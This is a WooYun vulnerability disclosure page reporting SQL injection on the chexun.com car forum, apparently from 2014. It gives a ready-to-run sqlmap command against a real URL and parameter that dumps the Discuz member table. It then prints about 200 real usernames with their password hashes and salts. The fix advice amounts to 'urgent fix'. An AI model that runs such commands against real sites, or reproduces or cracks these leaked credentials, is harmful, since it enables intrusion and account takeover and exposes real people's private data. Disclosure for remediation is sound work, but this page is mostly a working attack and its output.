当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-078810

漏洞标题:车讯网论坛高危SQL注入50万用户告急

相关厂商:车讯网

漏洞作者: 黑暗游侠

提交时间:2014-10-10 08:38

修复时间:2014-11-24 08:40

公开时间:2014-11-24 08:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-10-10: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-11-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

车讯网论坛高危SQL注入,50万用户告急

详细说明:

车讯网论坛高危SQL注入,50万用户告急

漏洞证明:

sqlmap下注射dz的用户,50W用户全部泄露:

sqlmap  -u "http://bbs.chexun.com/shop_list.php?mod=cat&catid=35" -p catid  -D discuz -T cdb_uc_members  -C username,password,salt,uid --dump --technique "U"


以下是截取部分用户:

Database: discuz
Table: cdb_uc_members
[212 entries]
+------+--------+-----------------+----------------------------------+
| uid  | salt   | username        | password                         |
+------+--------+-----------------+----------------------------------+
| 1    | 118945 | jmyzadmin1021   | dcc9dd60451e15010a32626df94c679d |
| 8547 | 499296 | paolomilan      | 21a6ad97492834b37474fe89e5d2b650 |
| 6918 | 330165 | lmx33           | f2c49bfed4d19ba278918dffcc5f9eac |
| 8554 | 474441 | shouchuangsengm | a2e7b78393a8323bfcb2b6d15e29d903 |
| 6913 | 601285 | limeixia        | 68b44e548076812f180e963148578cfb |
| 8564 | 828489 | ys05            | edae26c3b763291d426e9905630818ac |
| 6908 | 888405 | lmx11           | 2f4d2dc1a1fe7d9cb37f8cb3f28c1010 |
| 8548 | 757084 | jkqiche2        | e1de7f2cc5e3c1c7e7c8cfc8a97032f5 |
| 6904 | 411710 | winnie1         | b50b55c8460c60d0d4349c3dc8872ffd |
| 8549 | 717003 | zydes           | d3b7b15536b67cec6d206bdebfe1bf3f |
| 8546 | 775551 | jkqiche1        | ecec74fabd61498c9900ccd4eb04c518 |
| 6934 | 591845 | mekl            | fe25d21b10852d3e43a3089872f60c34 |
| 6933 | 258356 | jxlyy           | 467b248f0ad41dcafbc522ac28c8e9ca |
| 6932 | 350391 | xc              | a1bc1da45e0141438bd328a8031f4c62 |
| 6930 | 300602 | 小龙6528          | 6a0d33ce8ae41511d4f6197d4db37e2d |
| 6931 | 744410 | maxin           | d57dbe6c4d6d295f2f5a0893a5ded73e |
| 6936 | 775466 | trek            | 9aedd07f5beba8244c41284dd143f00e |
| 6937 | 601827 | 88lai           | e163e642487e954b833ed0af4a850e17 |
| 6938 | 319439 | qilin           | 8c61e33ba5661a80ac31e0eaf0386f1b |
| 6939 | 406398 | sq-1013         | a6fe00728dc1ccb4c597bca940d19af4 |
| 6940 | 615344 | jiaojiao666     | 9b70b96c58c90ccf1ddff93b691f0cf6 |
| 6941 | 699549 | jiaojiao66      | b1ff5e469e67bfc4c640620240807f46 |
| 6942 | 968890 | luhu            | 3b05f17f182ac62f37cc83a005e13e39 |
| 8567 | 324018 | Never           | e9950e4636348a2911725bafa4783d3d |
| 6945 | 705923 | maxin12         | 0091fad458430478e28930f37b6c41ab |
| 6946 | 661009 | guang           | de65493058fdd3b2aae932e129a9b64a |
| 6947 | 157960 | guang1          | 852d9ed6ca0e04ea8ae4e5f94ec201c8 |
| 6948 | 449359 | guang3          | 6b28da8574de0c6b79d7100c40128a66 |
| 6949 | 456546 | guang4          | d47fa3b4980c56d64654c7e6dc42e039 |
| 6950 | 495655 | chengbaijun     | 54088cfbc3ef99d31c0769598dbc4e85 |
| 6951 | 739794 | guang5          | 7bc93fc5889293a302e92e993aa16ce4 |
| 8558 | 121988 | ys16            | d235c3d8109744f0661e991fe401c359 |
| 8570 | 894951 | hxdk02          | 7c1916322cff9ee9e81d7ee803be77d3 |
| 6954 | 969959 | lgdwqvbkcg2     | 96b30053643f8d87cd03c5ac53d00e05 |
| 6955 | 496429 | lgdwqvbkcg3     | e80cc4c7d240d94624f272921028a566 |
| 8556 | 496236 | ys15            | 5094d0a9d13f07b8cf58aeadd086bf5c |
| 6957 | 798449 | lgdwqvbkcg4     | 146534757f3d58c69be3bcdc78fe7310 |
| 6958 | 384834 | maxin123        | 2f6c0b6a54b7417cfadba094be4ce0ee |
| 6959 | 253321 | guang7          | 548c28be3bfa34710da8fdfd6e0554b3 |
| 6960 | 210159 | maxin1234       | 3eb891872da1add1198769d74a236d59 |
| 8557 | 101837 | beijingliantong | 431df71bf941ec09ef571fb15da1d62d |
| 6973 | 928872 | lgdwqvbkcg11    | 2ef324d2d070eb467836fa97161a8387 |
| 6963 | 702005 | lgdwqvbkcg5     | 80e1470ad9fa94359c2f03b22749ebd4 |
| 6964 | 260194 | lgdwqvbkcg6     | 53a02160e1f0119430df2274699d707b |
| 6965 | 279264 | lgdwqvbkcg7     | 197e1fa270abba5980447de3477eef2a |
| 6966 | 902608 | lgdwqvbkcg9     | acff91f0a339e45b8ed52bcf6b5e138a |
| 6967 | 904605 | lgdwqvbkcg8     | 4dc9afbf819ea3bb342b31b397f56bb6 |
| 6968 | 954730 | lgdwqvbkcg10    | 305ce745974d04baeb8a1fe72e0f7cb9 |
| 8568 | 504435 | hxga024         | 037942974950bd58d4f04f5a24bcfeac |
| 6975 | 224044 | 夜诱              | 667cf82cc21ebf41bc2afaea807b0c21 |
| 6976 | 361129 | gerende         | acf88769fc30149a423e749313c54e58 |
| 6977 | 119779 | ding_chuanqin   | d80db7a9da7f009acfc02da955d03910 |
| 6978 | 823594 | xiaolong419     | b064f247f65fca8ac8c7d0e5357bc61c |
| 7067 | 330019 | JND117          | 976942d0ca46eb1d48657da7f5163672 |
| 7066 | 343798 | jnd105          | 2859eb77d057689e8dac911251869119 |
| 7065 | 529517 | format          | afad235d7bcd99e7fccda0899aa51bbe |
| 7064 | 891028 | jnd121          | 45b98766cb8deffb044b779f41bd88f3 |
| 7053 | 401759 | ELLA            | 56e904ed52fac067026de4bd8f1a7115 |
| 7063 | 878877 | jnd111          | 905f8599c939d4a97b41c61c946024ca |
| 6985 | 347574 | heavy           | 2db6ab0605e340165bd27f51885992a0 |
| 7062 | 797414 | dopoda          | cb02ef8686ed39446822b2d7b60a2846 |
| 7061 | 618671 | lgdwqvbkcg37    | 49af12893dafc68a09af90304b66878a |
| 6988 | 369562 | derby           | 094d1a31601732ebb8e29fb18237d461 |
| 6989 | 692366 | cuihua725       | 1169795e200792374c1ea84d609444e4 |
| 6990 | 588630 | guang9          | 79cfe02a74008ad90f1748e7d33e6887 |
| 6991 | 765991 | suyuqi          | 9991a9b03e6c87946240adb35f369481 |
| 7060 | 188602 | hyqft           | 06db888b7cbfeb72777d373a5b625029 |
| 6993 | 387079 | taozi           | a2238e2bf467b2e43337aeceb7e4828f |
| 6994 | 150826 | lgdwqvbkcg15    | f68c06a4d7f9e5299eb4989a54ca1d9e |
| 6995 | 341923 | wfyxk3482       | a9005d7d2257cd8a90b8362ab521b467 |
| 8550 | 497239 | test345         | 55e34cf37e7d612acbeb9209d4985fd2 |
| 8545 | 152664 | 于海峰             | 4cb0ea9b223b80df8a2a3790d282a3ac |
| 6998 | 270796 | levinknight521  | db71beea181f0c7d62296aafecbf0c3c |
| 8552 | 199245 | zysqm666        | b5fd503d3c19285b37048a790baf1417 |
| 7058 | 312858 | bailing123      | 2ac185ee8b69c2c226e146d591e8d6ca |
| 7057 | 450060 | houpengfei8023  | 457946f740a2e353d3753889ac98ae35 |
| 7056 | 101853 | lgdwqvbkcg36    | 7570d7851d9e5a3a480ffead3e667812 |
| 7003 | 217464 | lgdwqvbkcg17    | 85ad60bd52a8362fb44cc091452b80a6 |
| 7004 | 404791 | intel           | 8720f11f2bc5854eb468c53490fc93cb |
| 7005 | 506288 | amy_gelay       | e85bba58a6650919ce2379c511e50f4f |
| 7006 | 341509 | aniy            | f4dbbb70d4d6a126779af6a662b42871 |
| 7007 | 665920 | lengyue         | 6a926b46084c7ad288ecaaeb684247f2 |
| 7008 | 526068 | lgdwqvbkcg18    | a69f201d9e28b2bdebb884987efb0bc6 |
| 7009 | 165103 | lgdwqvbkcg19    | 3651859b54c358bb20d4328a19442e4b |
| 8569 | 895940 | hxdk01          | 334bd7de14b464c517d236509ba22480 |
| 7011 | 769866 | taole           | bdbb3ccc589d4f503a5cbe294890a0d7 |
| 7012 | 594621 | lgdwqvbkcg20    | 7736c7a1150061c52a2dd3bf1fea2baa |
| 7055 | 786968 | bj_test         | 6c73d5eb8a5847afa52ea8c3c16871c6 |
| 8551 | 171626 | cceesshhii      | b43078f32139f49d71ffa831946de5c6 |
| 7054 | 473499 | LJH999          | 753e6929febabc93e2436d828493a976 |
| 7016 | 134543 | lgdwqvbkcg22    | b2bad81d612182eaebf4a37c4de40b67 |
| 7017 | 869040 | lgdwqvbkcg23    | 6175dbe2ac188a369ba70748794aa43a |
| 7018 | 992170 | lgdwqvbkcg24    | 1bd546f2782fd2973a28768d6dc9d947 |
| 7019 | 404106 | 88888888        | 8eb5dc82d5cc44e9f5c9574f5c0ed96d |
| 7020 | 561406 | lgdwqvbkcg25    | 29df94d45357a219bfb16dec11c378de |
| 7021 | 580801 | winner          | cd1bfa466a055a8e9008212386c79699 |
| 7022 | 170098 | guang11         | fba1d766083c89ded3e93b1933532068 |
| 7023 | 650009 | sarm            | 239f5eee93e445400a52ac15ab04956b |
| 7024 | 867881 | lgdwqvbkcg26    | d7bc9d7f8edd6c6f301337e5c384d977 |
| 7025 | 220924 | lgdwqvbkcg27    | a61f9731fde32fe7d8b4c569dcfc3d36 |
| 7026 | 891933 | sally           | 3df048d9fcffb28e0b2fe55cd80be3a8 |
| 7027 | 365121 | parer           | 0426b74407e8b9230e6d49b9c1612ccb |
| 7028 | 273588 | kongguobin      | 103dd5b7c108b8304348e5f9bff82757 |
| 7029 | 162729 | 771077          | 7b0d02302eada48784eebe7e494c2356 |
| 7030 | 464366 | xiaoxiaolong    | 0bb9b48ccd2f343aa6ba16b6412277a8 |
| 7031 | 486447 | jackieyang      | 81616ea6d2d011c605028402f9d25e76 |
| 7032 | 512789 | lgdwqvbkcg28    | 8866c0cf518a7eca1d33678cdf0d2b78 |
| 7033 | 466220 | silover         | d345fcc5d09ca8d923591d47b4d7d534 |
| 7034 | 603911 | tbug            | cae4b46ce4c3d80a777bbee5e514a43d |
| 7035 | 817580 | tangchaolizi    | 11d02b5056f5fef446d664d394556731 |
| 7036 | 872508 | lgdwqvbkcg29    | 74416864f1591989dbabfef122f182a4 |
| 7037 | 845421 | zjlzjl          | c7d332681a7645723bd00d6f9e7d8f9f |
| 7038 | 483501 | zhang73051      | 70a61de65aa2b8ee8369bca84127e5a5 |
| 7039 | 398577 | changan4s-ycf   | d78900686cd351928dfab0f4a73a64c2 |
| 7040 | 910525 | gba2006         | 5ad2d3f2efd55d3fd2198c7b6408bbc3 |
| 7041 | 379441 | shixin          | d47ed78a495413cf45fe98900c0fe0e4 |
| 7042 | 168444 | lgdwqvbkcg30    | 2346f895e04ffa1788e35b7bdde75392 |
| 7043 | 505146 | lgdwqvbkcg31    | ad079a0052645b06c9ad41f6cafa673a |
| 7044 | 166410 | xllfiat         | 6c01f658f442587a11f8ed6f987da5e3 |
| 7045 | 240070 | bush            | cc5b846c37686a06b1edd1ad1b0f8a1d |
| 7046 | 878646 | lgdwqvbkcg32    | 3208ed926c92d2ba4f0705757702f18b |
| 7047 | 200953 | lgdwqvbkcg33    | 8dae5172c7b78ed12d2e12896278e222 |
| 7048 | 109111 | guoxg           | be2e1acdc3796a8202ed6317c4345966 |
| 7049 | 870817 | lgdwqvbkcg34    | 6547740d88c96894ae91c873833403cb |
| 7050 | 505059 | bj_jmyz         | c398bd9cffb0621d1ebbf3db3756493c |
| 7051 | 570518 | kkkk            | 0a17971f5e13c14b464557f225e05e06 |
| 7052 | 451618 | lgdwqvbkcg35    | 989d12cc61b900c3dae49229e2c493ea |
| 7068 | 575157 | jnd102          | f19b869ee54c6cc9b8eeb66b656099ef |
| 7069 | 220528 | lgdwqvbkcg38    | f96eb8cd9b1c60fda51a3a23cbc45d02 |
| 7070 | 319500 | jnd118          | b2aaeb10a68adcb86eb1f612349183e8 |
| 7071 | 696082 | fdiks           | fa924351e8aa8e7ca0df436b86076514 |
| 7072 | 112461 | jnd101          | 80bf3910582b56b6bb2b6cfb25a887ff |
| 7073 | 584621 | lgdwqvbkcg39    | 9b5ad56ff22f9bcbbc9796b8f428cf7d |
| 7074 | 869670 | liuqing13       | a57e1406bc9044dd031b5af2a7a7a55f |
| 7075 | 175191 | lgd123          | b920a5ef0141b562a310d83454b7ee7c |
| 7076 | 948988 | xieyima         | d1f20269854615f5916d75b15f085f98 |
| 7077 | 356118 | haibo_che       | 4ae07897f54f00796ddc796a4657264b |
| 7078 | 587981 | bjzqlrln        | 6d128689388a485247bff6fd1d9b7a9c |
| 7079 | 415208 | jnc101          | 0081d450bfcdae30733f0a87383e14ae |
| 7080 | 860030 | lgdwqvbkcg40    | 7784579eba1ed668d836336cb810fdb6 |
| 7081 | 405562 | bmcc            | 2d1c074c0e326cad828a355e061a34d6 |
| 7082 | 287717 | jnc108          | 4899999739ae0870f01755e7c4fe101c |
| 7083 | 705451 | goledn          | ca4f7e43d9623c73f83e776550837c90 |
| 8565 | 789063 | heavy3          | 1b3f28c4ba2f3bd6e76cfc13ef9100b4 |
| 7085 | 586294 | look            | 7a051c12319162ea73da10a113187d45 |
| 7086 | 615976 | liantonghaopu   | 5dc4383f258fda9cd60829c1e2922e22 |
| 7087 | 168505 | liantonghaopu01 | f6a9e4366ff1f139c6c4438250039807 |
| 7088 | 654738 | shouchuangshili | 5a5c561e38e233d47e59a6bc3e6dde35 |
| 7089 | 121123 | tengdaqinghong  | 326f67a282b23f81e7d49a279369f6a0 |
| 7090 | 234915 | nokia           | 60a01cce04629938f9b7e00bc9dd407b |
| 7091 | 794809 | andebao         | 6d317143216cd8cee84576d3d000f876 |
| 7092 | 899769 | baorui          | 15e98f25594459e52580df14a7074cb7 |
| 7093 | 335869 | yuntongbao      | fdd4de47186fe76adf8b2c04fa9df8a9 |
| 7094 | 803920 | yuntongboya     | bc0aee7748bfd3f8d46ae6ebfebdd8de |
| 7095 | 770586 | shangqianji     | 7ea0e62df1ab8905e065aa0e135cc36a |
| 7096 | 740929 | jiaruiya        | 8b7c6f0579b42ceb7c99995ad04a213f |
| 7097 | 374439 | kunboqiche      | 69283cc07f9a578ac625fdf72d1590e4 |
| 7098 | 222205 | biaolongjingjin | e40af37521485f2c4cb76796b1d800de |
| 7099 | 316087 | qinhexianglong  | 4f71c3b55a3f2b2f1785549676112157 |
| 8553 | 494967 | jkqiche8        | 0d3e55bd1e2f0153314a6a5df1324128 |
| 7101 | 441705 | beicheng        | d77765724143592e348cf818dbe3bbb2 |
| 7102 | 912169 | dashihang       | 7ce7f69b7455fc90d468836ed5adef54 |
| 7103 | 507429 | feixiangshunda  | 7a8db6a36a9ba7bccd2248ecf7b8c4ac |
| 7104 | 926327 | yihaiyongsheng  | b07240aea5e8fa05bb4688a4c4155440 |
| 7105 | 781840 | longze          | f2bbcaf18505e4dfe532c048cc8d8ca2 |
| 7106 | 582620 | xiangheqiche    | a213e100a0da9441328a718a2632f069 |
| 7107 | 875315 | dayun           | 7e732d5613a6c5fd6023024dc4f8c18a |
| 7108 | 137958 | zhongaotongda   | ceb0aefc826cff08e46d272894812212 |
| 8555 | 170601 | xiaolong        | 6979b6aba4d7e30398d245133c032a49 |
| 7110 | 290524 | junbaojie       | d697e2150d7b3c3b3284a5bee6b8ead4 |
| 7111 | 897988 | jiadayongtong   | 9e452c6432e0b485b48e0c89030ba896 |
| 7112 | 476163 | haitongxingye   | 4e2b15d9bb279d8e42c7a06e33bc3af3 |
| 7113 | 478241 | baichehang      | 5a28b8b6a47f899078f05c78e701ac0f |
| 7114 | 603440 | huaaoruijie     | 9acffa8d1c691a88110433e226313910 |
| 7115 | 265227 | longzeweiye     | f3273c0d5a8074f633e6476213cee63f |
| 7116 | 964536 | zhongqilifa     | 9e7bc295dd251800bb528e008f409f3d |
| 7117 | 219416 | bjtrqc01        | 9c09fa23ae99c57172b1404c45ac9028 |
| 7118 | 333732 | bjgfxax01       | 019d55c2178558298328bc4d70f5dda5 |
| 7119 | 619274 | bjsqtd01        | 1a67062f231f2921dc6d2b25dd096fae |
| 7120 | 240539 | BJSH            | d832a8966793fb54cbaf9ab00832b8dd |
| 7121 | 468647 | bjhyht01        | 2b58bf29ca60e9a440881c64bbd395da |
| 7122 | 414083 | bjytba01        | ffdbc5b8afe1660d75d6c41b4f96355a |
| 7123 | 140308 | bjzx01          | 663e38c3ffddc928342bf34f3a5abe94 |
| 7124 | 704517 | bjltat01        | efb525851bde30df11c94f3e40d151bc |
| 7125 | 218004 | bjbfhp01        | b5f7024a8a51728dfd4c2abbff432614 |
| 7126 | 810895 | bjcxd01         | 5af3c67adc15123a4da2deae3efaf188 |
| 7127 | 445446 | bjajt01         | 634fd8ff12221f0350d0b82f139e04a3 |
| 7128 | 492443 | bjxmh01         | f62e768c666ddf43da39badcc7ff3400 |
| 7129 | 933100 | bjwjx01         | be408648ff8ee98df6566c83e1c463a1 |
| 7130 | 661533 | bjrfs01         | d11a875364ceddcb2b259b45144948ec |
| 7131 | 887411 | bjflfr01        | 33a2830a8f6d1465d6b332cda9a0c4bc |
| 7132 | 374805 | bjxxw01         | 7b547e5546f55568dc910d8dac7fd22c |
| 7133 | 573702 | bjbrxy01        | 3801d304f2974c8c5152e002f0f77cbe |
| 7134 | 394840 | bjhthm01        | 01cb20006634868a72e2774623babb31 |
| 7135 | 301132 | bjhxhy01        | e7ea689ddb8a051b200202cf754c51b0 |
| 7136 | 355543 | BJBDL01         | 048c64d752fe47e8a311750a38a9bf4a |
| 7137 | 877461 | bjyb01          | 056c9aa1175a1b1b831b06b480b7f1e8 |
| 7138 | 176448 | bjzrf01         | fdf5ee6858d15be8b8956378c45dada2 |
| 7139 | 393501 | epox            | 2b8f9e952f54d98b8f013e27b027d4b3 |
| 7140 | 948063 | bjydb01         | 489b4314855d5a475c6a3678edd63be4 |
| 7141 | 366973 | bjrfcm01        | 8ac4066740313d960014bcfc77182d50 |
| 7142 | 291490 | BJZQTDWY01      | b7f79621dc8c852189c3998d73855954 |
| 7143 | 424226 | bjyzb01         | d92749c5c747885281f51c823d8ecaa1 |
| 7144 | 745214 | bjyzb02         | 7524d106653eb57a50bcd9a6a7dbba19 |
| 7145 | 794930 | bjjbh01         | 31a47ea4d113521c1dbe4b3a9dee0a08 |
| 7146 | 589454 | bjtcjr01        | 68291b89fde4510c735e767ffeabe86b |
| 7147 | 709750 | bjjbh02         | 5917dc7793e06bc632c28401a0f33d8e |
| 7148 | 914347 | bjytty01        | a3393592ba63b73997cc74f672ce31ce |
| 7149 | 823186 | bjzatd01        | 01030db7037c4c17db2c469997b48e50 |
| 7150 | 329025 | bjcdb01         | f8c604462b2169ec04e1cb25cfe399ef |
| 7151 | 154886 | bjzbc01         | 6f92486158ce7418a4f54e2be445e11b |
| 7152 | 291834 | BJGYF01         | dc3635c30675eaa419a86d5e33b0ada1 |
+------+--------+-----------------+----------------------------------+

修复方案:

紧急修复

版权声明:转载请注明来源 黑暗游侠@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)